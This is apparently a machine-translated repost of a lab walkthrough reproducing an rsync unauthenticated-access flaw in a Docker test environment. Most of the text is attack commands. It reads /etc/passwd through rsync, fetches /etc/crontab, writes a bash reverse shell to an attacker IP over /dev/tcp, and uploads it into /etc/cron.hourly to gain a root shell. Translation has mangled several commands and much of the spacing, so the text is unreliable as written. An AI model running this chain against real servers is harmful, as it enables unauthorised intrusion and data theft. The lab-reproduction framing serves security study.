Example Analysis of rsync vulnerability recurrence 03/30 Update SLTechnology News&Howtos

Example Analysis of rsync vulnerability recurrence

2025-03-30 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

Editor to share with you the example analysis of the recurrence of rsync vulnerabilities, I believe that most people do not know much about it, so share this article for your reference, I hope you will learn a lot after reading this article, let's go to know it!

Recurrence of rsync vulnerabilities

1. First of all, we need to enter the directory of the vulnerability environment we downloaded.

two。 Compile and run the rsync server:

Docker-compose up-d

Found that the pull was successful.

View address

3. Loophole recurrence

Check the file of his module first.

Rsync rsync://127.0.0.1/src

Upload any file

All you need is touch to create one.

Rsync zxc.txt rsync://127.0.0.1/src/home

View uploaded files

Rsync rsync://127.0.0.1:873/src/home/zxc.txt

Download any file

Rsync://127.0.0.1/src/etc/passwd

Bounce shell by writing cron tasks

1. Download the task plan file

Rsync-av rsync://127.0.0.1/src/etc/crontab crontab.txt

The task plan indicates that the run-parts-- report / etc/cron.hourly command will be executed at the 17th minute of each hour.

17 * root cd / & & run-parts-- report / etc/cron.hourly

2. Construct shell

#! / bin/bash / bin/bash-I > & / dev/tcp/192.168.0.128/4444 0 > & 1 / / ip is the address of kali

Upload shell

Rsync-av shell rsync://127.0.0.1/src/etc/cron.hourly

Then bounce back the shell, but wait 17 minutes, or you'll have to modify that file.

The second way to get shell

Docker ps

Sudo docker exec-it c1de2543df7b bash

Found that it was a success.

It just so happens that we modify the execution file here.

First install vim

Apt-get update # # Update

Apt install vim

And then change it to one minute.

Or the second step:

Go directly to the directory where the shell was uploaded

Cd / etc/cron.hourly/

. / shell

Found that the rebound was successful

The above is all the contents of the article "sample Analysis of rsync vulnerability recurrence". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.